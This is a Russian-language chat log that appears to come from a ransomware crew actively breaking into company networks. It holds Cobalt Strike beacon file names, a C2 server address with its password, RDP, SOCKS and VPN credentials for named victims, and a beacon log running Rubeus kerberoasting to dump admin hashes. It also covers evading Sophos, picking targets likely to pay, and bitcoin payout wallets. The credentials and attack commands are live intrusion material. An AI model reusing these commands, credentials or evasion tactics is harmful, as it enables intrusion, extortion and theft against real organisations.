[2023-11-19 00:00:00] @usernamegg:matrix.bestflowers247.online: скинь криптованные эти файлы которые зарустил
--------------------
[2023-11-19 00:00:48] @burito:matrix.bestflowers247.online: да нет их, есть кусок бинаря, который в дебагер пихаю и там запускаю
--------------------
[2023-11-19 00:14:39] @usernamegg:matrix.bestflowers247.online: https://www.zoominfo.com/c/cygnus-home-service-llc/478997844
--------------------
[2023-11-19 00:14:43] @usernamegg:matrix.bestflowers247.online: сейчас еще его позову
--------------------
[2023-11-19 00:14:52] @usernamegg:matrix.bestflowers247.online: дам рдп
--------------------
[2023-11-19 00:14:59] @usernamejj:matrix.bestflowers247.online: ++
--------------------
[2023-11-19 00:15:44] @usernamegg:matrix.bestflowers247.online: а давай на порт перезовем
--------------------
[2023-11-19 00:15:52] @usernamegg:matrix.bestflowers247.online: сейчас сделаю другой два таких же пейлоага
--------------------
[2023-11-19 00:15:54] @usernamegg:matrix.bestflowers247.online: и позовешь
--------------------
[2023-11-19 00:16:06] @usernamegg:matrix.bestflowers247.online: а то не отвечает на команды
--------------------
[2023-11-19 00:16:35] @usernamegg:matrix.bestflowers247.online: сейчас на порт еще Rick позову
--------------------
[2023-11-19 00:16:53] @usernamejj:matrix.bestflowers247.online: ++
--------------------
[2023-11-19 00:19:09] @burito:matrix.bestflowers247.online: да, давай
--------------------
[2023-11-19 00:19:41] @burito:matrix.bestflowers247.online: что-то видать блочит где-то
--------------------
[2023-11-19 00:19:45] @usernamegg:matrix.bestflowers247.online: artifact_x86_port23.dll
--------------------
[2023-11-19 00:20:00] @burito:matrix.bestflowers247.online: ок
--------------------
[2023-11-19 00:20:16] @usernamegg:matrix.bestflowers247.online: beacon_x86_port23.dll
--------------------
[2023-11-19 00:20:23] @usernamegg:matrix.bestflowers247.online: вот два таких же только на порт
--------------------
[2023-11-19 00:20:58] @burito:matrix.bestflowers247.online: щас
--------------------
[2023-11-19 00:28:48] @usernamegg:matrix.bestflowers247.online: ```
13.40.155.112
Administrator
nW;=@kipFf3ff74LNKvFn@qnEGykHmub
```
--------------------
[2023-11-19 00:28:52] @usernamegg:matrix.bestflowers247.online: зайду на рдп
--------------------
[2023-11-19 00:30:16] @usernamegg:matrix.bestflowers247.online: 13.57.243.97:15012
--------------------
[2023-11-19 00:30:22] @usernamegg:matrix.bestflowers247.online: вот еще сокс от этой сети
--------------------
[2023-11-19 00:30:29] @usernamegg:matrix.bestflowers247.online: https://www.zoominfo.com/c/cygnus-home-service-llc/478997844
$2.4B
--------------------
[2023-11-19 00:30:37] @usernamegg:matrix.bestflowers247.online: сейчас только что пришел ботинок
--------------------
[2023-11-19 00:30:42] @usernamegg:matrix.bestflowers247.online: быстрее бери в работу
--------------------
[2023-11-19 00:30:51] @usernamejj:matrix.bestflowers247.online: хорошо
--------------------
[2023-11-19 00:32:16] @usernamegg:matrix.bestflowers247.online: v celom tam nado bistro vse zdelat' mozhet sessiu uzer zakroet , no ya vostnovolyu ego cherez nekotore vremya , no na novom citrixe uzhe budet
--------------------
[2023-11-19 00:32:52] @usernamejj:matrix.bestflowers247.online: постараюсь быстро
--------------------
[2023-11-19 00:34:39] @burito:matrix.bestflowers247.online: второй пошел
--------------------
[2023-11-19 00:34:46] @burito:matrix.bestflowers247.online: первый рубанул сразу
--------------------
[2023-11-19 00:35:02] @usernamegg:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

вот этот прошел ?
--------------------
[2023-11-19 00:35:09] @burito:matrix.bestflowers247.online: да
--------------------
[2023-11-19 00:35:34] @usernamegg:matrix.bestflowers247.online: на порт пришел
--------------------
[2023-11-19 00:35:38] @usernamegg:matrix.bestflowers247.online: отвечает на команды
--------------------
[2023-11-19 00:35:40] @usernamegg:matrix.bestflowers247.online: сейчас креды дам
--------------------
[2023-11-19 00:36:17] @usernamegg:matrix.bestflowers247.online: COBA_23

COBA://167.114.188.51:46904
Ox05ae5IZYKuyzfBJVMNsaW1Dg9qeW3lrTg
--------------------
[2023-11-19 00:41:19] @usernamegg:matrix.bestflowers247.online: спаун не пришел к тебе в кобу ?
--------------------
[2023-11-19 00:41:50] @usernamegg:matrix.bestflowers247.online: unhook ???
--------------------
[2023-11-19 00:41:52] @usernamejj:matrix.bestflowers247.online: не
--------------------
[2023-11-19 00:42:12] @usernamejj:matrix.bestflowers247.online: это плагин
--------------------
[2023-11-19 00:42:25] @usernamegg:matrix.bestflowers247.online: все откис ?
--------------------
[2023-11-19 00:42:29] @usernamegg:matrix.bestflowers247.online: снова звать ?
--------------------
[2023-11-19 00:42:35] @usernamegg:matrix.bestflowers247.online: еще раз
--------------------
[2023-11-19 00:42:37] @usernamejj:matrix.bestflowers247.online: да
--------------------
[2023-11-19 00:42:38] @usernamegg:matrix.bestflowers247.online: не все успел
--------------------
[2023-11-19 00:42:42] @usernamegg:matrix.bestflowers247.online: позови
--------------------
[2023-11-19 00:42:52] @usernamejj:matrix.bestflowers247.online: у меня инжект и спаун не отработали
--------------------
[2023-11-19 00:42:53] @usernamegg:matrix.bestflowers247.online: сейчаас перезову
--------------------
[2023-11-19 00:44:14] @burito:matrix.bestflowers247.online: щас
--------------------
[2023-11-19 00:46:01] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-19 00:46:02] @usernamegg:matrix.bestflowers247.online: есть
--------------------
[2023-11-19 00:46:12] @usernamegg:matrix.bestflowers247.online: еще один раза
--------------------
[2023-11-19 00:46:14] @burito:matrix.bestflowers247.online: запустил, софос гасит собака....
--------------------
[2023-11-19 00:46:15] @usernamegg:matrix.bestflowers247.online: на всякий случай
--------------------
[2023-11-19 00:46:20] @usernamegg:matrix.bestflowers247.online: вдруг откиснет опять
--------------------
[2023-11-19 00:46:28] @usernamegg:matrix.bestflowers247.online: стучит
--------------------
[2023-11-19 00:46:32] @usernamegg:matrix.bestflowers247.online: я работают уже
--------------------
[2023-11-19 00:46:39] @usernamegg:matrix.bestflowers247.online: еще раз позови про запас
--------------------
[2023-11-19 00:46:47] @burito:matrix.bestflowers247.online: ща
--------------------
[2023-11-19 00:47:11] @burito:matrix.bestflowers247.online: он щас висит, перезапустить?
--------------------
[2023-11-19 00:47:19] @usernamegg:matrix.bestflowers247.online: у тебя там уже есть креды
--------------------
[2023-11-19 00:47:26] @usernamegg:matrix.bestflowers247.online: админ ты с ними
--------------------
[2023-11-19 00:47:40] @usernamegg:matrix.bestflowers247.online: скинь список компов проскань по ним
--------------------
[2023-11-19 00:47:44] @usernamegg:matrix.bestflowers247.online: с этими кредами
--------------------
[2023-11-19 00:47:54] @usernamegg:matrix.bestflowers247.online: главное уйти с этой тачки
--------------------
[2023-11-19 00:47:59] @usernamegg:matrix.bestflowers247.online: движение надо
--------------------
[2023-11-19 00:48:18] @usernamejj:matrix.bestflowers247.online: хорошо
--------------------
[2023-11-19 00:48:21] @usernamegg:matrix.bestflowers247.online: и фаил я дождусь криптованный
--------------------
[2023-11-19 00:48:22] @usernamegg:matrix.bestflowers247.online: ?
--------------------
[2023-11-19 00:48:40] @burito:matrix.bestflowers247.online: 'AmsiRegistrationProtection' malicious behavior prevented in Displays NIC MAC information
'Shellcode' exploit prevented in Host Process for Windows Services
'CodeCave' malicious behavior prevented in Media Player Classic

и видишь он блочит по действиям
--------------------
[2023-11-19 00:48:51] @burito:matrix.bestflowers247.online: да нет его, нет
--------------------
[2023-11-19 00:49:04] @usernamegg:matrix.bestflowers247.online: понял
--------------------
[2023-11-19 00:49:18] @burito:matrix.bestflowers247.online: я кусок кода в дебагер пихаю и там запускаю. ехе палит и рубит, только через дебагер запускается
--------------------
[2023-11-19 00:49:37] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-11-19 в 03.49.31.png
--------------------
[2023-11-19 00:49:42] @usernamegg:matrix.bestflowers247.online: файлы нет для живжения по этой сети
--------------------
[2023-11-19 00:49:55] @usernamegg:matrix.bestflowers247.online: только теми что есть выше
--------------------
[2023-11-19 00:50:02] @usernamegg:matrix.bestflowers247.online: придеться ходить (
--------------------
[2023-11-19 00:50:06] @usernamegg:matrix.bestflowers247.online: я ничего не притяну
--------------------
[2023-11-19 00:50:14] @burito:matrix.bestflowers247.online: давай пока так
--------------------
[2023-11-19 00:50:19] @usernamegg:matrix.bestflowers247.online: [11/19 03:46:51] JJ beacon> execute-assembly Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\Users\Public\rub.txt
[11/19 03:46:52] [*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\Users\Public\rub.txt
[11/19 03:46:59] [+] host called home, sent: 555223 bytes
--------------------
[2023-11-19 00:50:23] @usernamegg:matrix.bestflowers247.online: снимает думаешь ?
--------------------
[2023-11-19 00:50:24] @burito:matrix.bestflowers247.online: а везде этот софос?
--------------------
[2023-11-19 00:50:32] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-11-19 00:50:43] @usernamegg:matrix.bestflowers247.online: ну думаю на 98%
--------------------
[2023-11-19 00:50:47] @usernamegg:matrix.bestflowers247.online: тачек
--------------------
[2023-11-19 00:50:59] @burito:matrix.bestflowers247.online: а тачек 100 штук?))
--------------------
[2023-11-19 00:51:03] @usernamejj:matrix.bestflowers247.online: если от exe защита, то не сработает видимо
--------------------
[2023-11-19 00:51:24] @usernamegg:matrix.bestflowers247.online: сканить
--------------------
[2023-11-19 00:51:25] @usernamegg:matrix.bestflowers247.online: ставь
--------------------
[2023-11-19 00:51:38] @usernamejj:matrix.bestflowers247.online: на линуксе просканю
--------------------
[2023-11-19 00:51:38] @usernamegg:matrix.bestflowers247.online: там ебать сеть должна настроенна
--------------------
[2023-11-19 00:51:44] @usernamegg:matrix.bestflowers247.online: если это мясоеды
--------------------
[2023-11-19 00:51:51] @usernamegg:matrix.bestflowers247.online: то эта та сеть которая заплатит
--------------------
[2023-11-19 00:52:00] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2023-11-19 00:52:16] @usernamegg:matrix.bestflowers247.online: тот дотсуп что выше тоже надо сейчас паралельно отрабатывать
--------------------
[2023-11-19 00:52:23] @usernamegg:matrix.bestflowers247.online: так как он сдохнет быстро
--------------------
[2023-11-19 00:52:26] @usernamegg:matrix.bestflowers247.online: FF пускай поможет
--------------------
[2023-11-19 00:52:43] @usernamegg:matrix.bestflowers247.online: говори ему что делать , координируй его он поймет
--------------------
[2023-11-19 00:52:53] @usernamejj:matrix.bestflowers247.online: хорошо
--------------------
[2023-11-19 00:53:08] @usernamegg:matrix.bestflowers247.online: ты зашел ведь на рдп ?
--------------------
[2023-11-19 00:53:21] @usernamegg:matrix.bestflowers247.online: там впнка включена уже
--------------------
[2023-11-19 00:53:29] @usernamejj:matrix.bestflowers247.online: да
--------------------
[2023-11-19 00:53:57] @burito:matrix.bestflowers247.online: давай щас ехешек сделаю, мож на других и пойдет...
--------------------
[2023-11-19 00:54:08] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2023-11-19 00:54:37] @usernamegg:matrix.bestflowers247.online: у тебя списка тачек нету еще
--------------------
[2023-11-19 01:07:20] @burito:matrix.bestflowers247.online: port23.rar
--------------------
[2023-11-19 01:07:29] @burito:matrix.bestflowers247.online: exe
--------------------
[2023-11-19 01:08:02] @burito:matrix.bestflowers247.online: beacon_x86_port23
--------------------
[2023-11-19 01:17:20] @usernamejj:matrix.bestflowers247.online: еще админ на 10.1.128.28
--------------------
[2023-11-19 01:17:40] @usernamejj:matrix.bestflowers247.online: но jump туда не сработает
--------------------
[2023-11-19 01:45:06] @burito:matrix.bestflowers247.online: ладно, пойду
--------------------
[2023-11-19 01:45:21] @burito:matrix.bestflowers247.online: бонусы можно сюда
19RdXdWXKJxf8SFndnvvpCAxUptBbQpqgG
--------------------
[2023-11-19 02:13:36] @usernamejj:matrix.bestflowers247.online: на 10.1.128.28 тоже софос. в кобу не идет
--------------------
[2023-11-19 02:14:18] @usernameff:matrix.bestflowers247.online: ```
13.40.155.112
Administrator
nW;=@kipFf3ff74LNKvFn@qnEGykHmub
```
--------------------
[2023-11-19 02:14:20] @usernameff:matrix.bestflowers247.online: не в домене
--------------------
[2023-11-19 13:24:45] @usernamegg:matrix.bestflowers247.online: ну тачка сутчит которую вчера затянули ?
--------------------
[2023-11-19 13:24:54] @usernamegg:matrix.bestflowers247.online: я тут
--------------------
[2023-11-19 13:24:56] @usernamegg:matrix.bestflowers247.online: сейчс
--------------------
[2023-11-19 13:28:26] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2023-11-19 13:28:27] @usernamegg:matrix.bestflowers247.online: ну что там ?
--------------------
[2023-11-19 13:28:32] @usernamegg:matrix.bestflowers247.online: я в баню поеду сейчас
--------------------
[2023-11-19 13:36:21] @usernamegg:matrix.bestflowers247.online: https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg
--------------------
[2023-11-19 13:36:24] @usernamegg:matrix.bestflowers247.online: изучайте
--------------------
[2023-11-19 13:36:28] @usernamegg:matrix.bestflowers247.online: https://www.youtube.com/watch?v=1Abt_Jpx2nM
--------------------
[2023-11-19 13:36:47] @usernamejj:matrix.bestflowers247.online: перестала стучать
--------------------
[2023-11-19 13:36:58] @usernamejj:matrix.bestflowers247.online: ++
--------------------
[2023-11-19 13:37:21] @usernamegg:matrix.bestflowers247.online: > <@usernameff:matrix.bestflowers247.online> ```
> 13.40.155.112
> Administrator
> nW;=@kipFf3ff74LNKvFn@qnEGykHmub
> ```

это мой рдп ))
--------------------
[2023-11-19 13:38:00] @usernamegg:matrix.bestflowers247.online: там был citrix
--------------------
[2023-11-19 13:38:11] @usernamegg:matrix.bestflowers247.online: это как vnc
--------------------
[2023-11-19 13:38:24] @usernamegg:matrix.bestflowers247.online: где хочешь можешь открыть
--------------------
[2023-11-19 13:38:50] @usernamegg:matrix.bestflowers247.online: я выдал сразй свой рдп что бы не объяснять как устанавливать и тд
--------------------
[2023-11-19 13:39:03] @usernamegg:matrix.bestflowers247.online: рдп не должен быть в домене (
--------------------
[2023-11-19 13:39:30] @usernamegg:matrix.bestflowers247.online: цитрикс это корп прога которой пользуються почти все компании мира
--------------------
[2023-11-19 13:40:23] @usernamegg:matrix.bestflowers247.online: через такой продвинутый vnc можешь работать в виртуалке на их сервере
--------------------
[2023-11-19 13:41:08] @usernamegg:matrix.bestflowers247.online: я поехал в баню
--------------------
[2023-11-19 13:41:22] @usernamegg:matrix.bestflowers247.online: через 4-5 часов вернусь, сяду работать буду выдавать вам таргеты
--------------------
[2023-11-19 13:41:28] @usernamegg:matrix.bestflowers247.online: будьте на связи
--------------------
[2023-11-19 13:41:34] @usernamejj:matrix.bestflowers247.online: ++
--------------------
[2023-11-19 13:42:02] @usernamegg:matrix.bestflowers247.online: что бы у вас был успех садитеьс проходить гуаде
--------------------
[2023-11-19 13:42:09] @usernamegg:matrix.bestflowers247.online: надо повышать скил сейчас
--------------------
[2023-11-19 13:42:30] @usernamegg:matrix.bestflowers247.online: все что было до этого это просто базовые знания которые вам дал VV
--------------------
[2023-11-19 13:42:34] @usernamegg:matrix.bestflowers247.online: сейчас все сначала
--------------------
[2023-11-19 13:42:42] @usernamegg:matrix.bestflowers247.online: по тому что другие доступы и другой вид раскрутки
--------------------
[2023-11-19 13:44:06] @usernamegg:matrix.bestflowers247.online: либо вы учитесь и развиваетсь либо не будет успеха. это сейчас вся работа с нового листа с той ифраструктурой которую я выстроил за несколько лет, впн это новый белый лист , я говорю это серьезно.
--------------------
[2023-11-19 13:44:39] @usernamegg:matrix.bestflowers247.online: я свои выходные трачу на вас а мог бы отдыхать, потому что хочу что был успех и вы смогли научиться крутить совсем другие виды доступов
--------------------
[2023-11-19 13:46:25] @usernamegg:matrix.bestflowers247.online: завтра мы сядем основной командой и что не получилось у вас сделать , они сделаю 99% так как а) опыт,  б) постоянно изучение нового матерьяла и неоднократное прохождение лабы.
--------------------
[2023-11-19 13:48:04] @usernamegg:matrix.bestflowers247.online: * завтра мы сядем основной командой и что не получилось у вас сделать , они сделаю 99% так как: а) опыт,  б) постоянно изучение нового матерьяла и неоднократное прохождение лабы. Сейчас все по новой и высе сначала, просто поймите это, надо сейчас сидеть будет очень много и очень плотно. Впн, это слепой котенок который тыкается в пустоте разыскивая куда присосаться.
--------------------
[2023-11-19 13:48:42] @usernamegg:matrix.bestflowers247.online: * завтра мы сядем основной командой и что не получилось у вас сделать , они сделаю 99% так как: а) опыт,  б) постоянно изучение нового матерьяла и неоднократное прохождение лабы. Сейчас все по новой и все сначала, просто поймите это, надо сейчас сидеть будет очень много и очень плотно. Впн, это слепой котенок который тыкается в пустоте разыскивая куда присосаться.
--------------------
[2023-11-19 13:53:04] @usernamegg:matrix.bestflowers247.online: понятно
--------------------
[2023-11-19 15:06:03] @w:matrixtcFJHPDblmt2rg.network: Привет
--------------------
[2023-11-19 15:06:05] @w:matrixtcFJHPDblmt2rg.network: +++
--------------------
[2023-11-19 15:06:07] @w:matrixtcFJHPDblmt2rg.network: Ниче, все в порядке
--------------------
[2023-11-19 15:06:22] @w:matrixtcFJHPDblmt2rg.network: Фиксил 1 баг в поисковике целый день
--------------------
[2023-11-19 15:06:35] @w:matrixtcFJHPDblmt2rg.network: и еще тут по боту, детект от дефа снял в новом билде
--------------------
[2023-11-19 15:07:05] @w:matrixtcFJHPDblmt2rg.network: теперь 3 деткта, нортон, комодо ( все равно выходит из вырты и запускается ), квик хил - палит все таки инжект самого бота в другой процесс, чтобы чисто из памяти работать
--------------------
[2023-11-19 15:07:22] @w:matrixtcFJHPDblmt2rg.network: Щас вот MSI буду делать, завтра запустимся
--------------------
[2023-11-19 15:07:37] @w:matrixtcFJHPDblmt2rg.network: Я завтра в до 3-ех по МСК даже
--------------------
[2023-11-19 17:41:45] @usernameugway:matrix.bestflowers247.online: бро привет, по нагрузке есть надежда?
--------------------
[2023-11-19 17:42:00] @usernameugway:matrix.bestflowers247.online: тоже читаю, но пока интересного не нашел
--------------------
[2023-11-19 17:46:51] @burito:matrix.bestflowers247.online: шалом. а можешь мне открыть доступ к тачке с фососом? хочу кое-что потестить
--------------------
[2023-11-19 19:48:58] @usernameyy:matrix.bestflowers247.online: ку
--------------------
[2023-11-19 19:49:02] @usernameyy:matrix.bestflowers247.online: ты ко скольки завтра?
--------------------
[2023-11-19 20:12:54] @usernamegg:matrix.bestflowers247.online: я к 10 утра
--------------------
[2023-11-19 20:12:56] @usernamegg:matrix.bestflowers247.online: тебе к 12
--------------------
[2023-11-19 20:13:01] @usernamegg:matrix.bestflowers247.online: кошель оставь еще
--------------------
[2023-11-19 20:13:14] @usernamegg:matrix.bestflowers247.online: сейчас
--------------------
[2023-11-19 20:13:27] @usernamegg:matrix.bestflowers247.online: ты тут ?
--------------------
[2023-11-19 20:13:39] @usernamegg:matrix.bestflowers247.online: JJ
--------------------
[2023-11-19 20:13:41] @usernamejj:matrix.bestflowers247.online: да
--------------------
[2023-11-19 20:13:43] @usernamegg:matrix.bestflowers247.online: ответь в личке
--------------------
[2023-11-19 20:13:46] @usernamegg:matrix.bestflowers247.online: вот
--------------------
[2023-11-19 20:13:50] @usernamegg:matrix.bestflowers247.online: дай мне снова рдп
--------------------
[2023-11-19 20:13:57] @usernamegg:matrix.bestflowers247.online: и открой там тачку с софосом
--------------------
[2023-11-19 20:14:28] @usernameyy:matrix.bestflowers247.online: ```
bc1q0dcg402vzx2rh97ljmdjy5qqld4uayyhwhpw5x0um8shkeq565nsq2s2ny
--------------------
[2023-11-19 20:14:43] @usernamegg:matrix.bestflowers247.online: > <@w:matrixtcFJHPDblmt2rg.network> Щас вот MSI буду делать, завтра запустимся

msi или msix ?
--------------------
[2023-11-19 20:14:50] @usernamegg:matrix.bestflowers247.online: подписывать надо будет сертом
--------------------
[2023-11-19 20:14:59] @usernameyy:matrix.bestflowers247.online: остальыне ко скольки?
--------------------
[2023-11-19 20:14:59] @usernamejj:matrix.bestflowers247.online: ```
85.239.60.107:56777
Administrator
A74q1LSFl59u2EeHzn
```
--------------------
[2023-11-19 20:15:06] @usernameyy:matrix.bestflowers247.online: тебе не скучно там будет?
--------------------
[2023-11-19 20:16:08] @usernamejj:matrix.bestflowers247.online: похоже пароль сменили. при подключении к впн: User authentication failed. Please try again
--------------------
[2023-11-19 20:16:26] @usernamegg:matrix.bestflowers247.online: рдп тоже не открывает ?
--------------------
[2023-11-19 20:17:57] @usernamejj:matrix.bestflowers247.online: не, потому что доступа к их локальной сети нет
--------------------
[2023-11-19 20:18:03] @usernamegg:matrix.bestflowers247.online: [19:57:21] YD - SMTP логи : привет
вот новые, хорошие: https://file.io/TYCrEep0xbv2
--------------------
[2023-11-19 20:19:26] @usernamegg:matrix.bestflowers247.online: ушло
--------------------
[2023-11-19 20:19:43] @usernamegg:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> остальыне ко скольки?

так же плюс минус
--------------------
[2023-11-19 20:19:48] @usernameyy:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> ушло

есть
--------------------
[2023-11-19 20:19:49] @usernamegg:matrix.bestflowers247.online: $$ ночью сегодня приедет
--------------------
[2023-11-19 20:19:58] @usernameyy:matrix.bestflowers247.online: ок
--------------------
[2023-11-19 20:20:06] @usernamegg:matrix.bestflowers247.online: > <@usernameugway:matrix.bestflowers247.online> бро привет, по нагрузке есть надежда?

нету (
--------------------
[2023-11-19 20:20:11] @usernamegg:matrix.bestflowers247.online: я пока жду
--------------------
[2023-11-19 20:20:25] @usernamegg:matrix.bestflowers247.online: надо ждать да
--------------------
[2023-11-19 20:20:27] @usernameyy:matrix.bestflowers247.online: я пойду щас спать, если проснусь к 8 то приеду с вами
--------------------
[2023-11-19 20:20:38] @usernameyy:matrix.bestflowers247.online: пока хз че по состоянию, пока заболеваю)
--------------------
[2023-11-19 20:21:17] @usernamegg:matrix.bestflowers247.online: я тут сплю
--------------------
[2023-11-19 20:21:24] @usernamegg:matrix.bestflowers247.online: не далеко
--------------------
[2023-11-19 20:21:28] @usernamegg:matrix.bestflowers247.online: вместе можем поехать
--------------------
[2023-11-19 20:21:36] @usernameyy:matrix.bestflowers247.online: ты во сколько выезжаешь?
--------------------
[2023-11-19 20:21:42] @usernamegg:matrix.bestflowers247.online: напишу
--------------------
[2023-11-19 20:21:44] @usernameyy:matrix.bestflowers247.online: ок
--------------------
[2023-11-19 20:21:50] @usernameyy:matrix.bestflowers247.online: спокойной ночи
--------------------
[2023-11-19 20:21:56] @usernamegg:matrix.bestflowers247.online: добрых снов
--------------------
[2023-11-19 20:22:17] @usernamegg:matrix.bestflowers247.online: погоди
--------------------
[2023-11-19 20:22:28] @usernamegg:matrix.bestflowers247.online: edc.dk
(4c85c239-9138-45a6-b0d8-78869c6e1f7a)
--------------------
[2023-11-19 20:22:32] @usernamegg:matrix.bestflowers247.online: что там скинули за фаил
--------------------
[2023-11-19 20:22:33] @usernamegg:matrix.bestflowers247.online: смотрел ?
--------------------
[2023-11-19 20:37:34] @usernamegg:matrix.bestflowers247.online: а HH где ?
--------------------
[2023-11-19 20:38:03] @usernamegg:matrix.bestflowers247.online: скинь мне доступ я проверю все
--------------------
[2023-11-19 20:38:07] @usernamegg:matrix.bestflowers247.online: не помню уже какой конкретно
--------------------
[2023-11-19 20:38:13] @usernamegg:matrix.bestflowers247.online: австралия же там была
--------------------
[2023-11-19 20:39:28] @usernamejj:matrix.bestflowers247.online: HH здесь
--------------------
[2023-11-19 20:40:08] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-19 20:40:10] @usernamegg:matrix.bestflowers247.online: доступ
--------------------
[2023-11-19 20:40:39] @usernamegg:matrix.bestflowers247.online: все нашел
--------------------
[2023-11-19 20:40:39] @usernamegg:matrix.bestflowers247.online: https://vpn-portal.wmb.midfieldgroup.com/userportal/webpages/myaccount/login.jsp
USER: Rick.Kessels
PASS: @we2022HJ
--------------------
[2023-11-19 20:40:43] @usernamejj:matrix.bestflowers247.online: если австралия, то это мясники, которые с софосом были, у них пароль сменился
--------------------
[2023-11-19 23:16:23] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> msi или msix ?

msi конечно
--------------------
[2023-11-19 23:16:45] @w:matrixtcFJHPDblmt2rg.network: он же лучше идет
--------------------
[2023-11-19 23:17:04] @w:matrixtcFJHPDblmt2rg.network: почти готово, завтра с утра доделаю, вареный уже жесть
--------------------
[2023-11-19 23:25:33] @w:matrixtcFJHPDblmt2rg.network: https://github.com/nathan31337/Splunk-RCE-poc
--------------------
[2023-11-19 23:28:29] @w:matrixtcFJHPDblmt2rg.network: Братец, я отдыхать пойду уже, почти все готово на завтра, завтра буду на связи с утра и сразу продолжу все доделывать
--------------------
[2023-11-19 23:28:42] @w:matrixtcFJHPDblmt2rg.network: постоараюсь пораньше встать, чтобы как можно больше успеть за завтра
--------------------
[2023-11-19 23:28:48] @w:matrixtcFJHPDblmt2rg.network: Добрых снов, завтра связь
--------------------
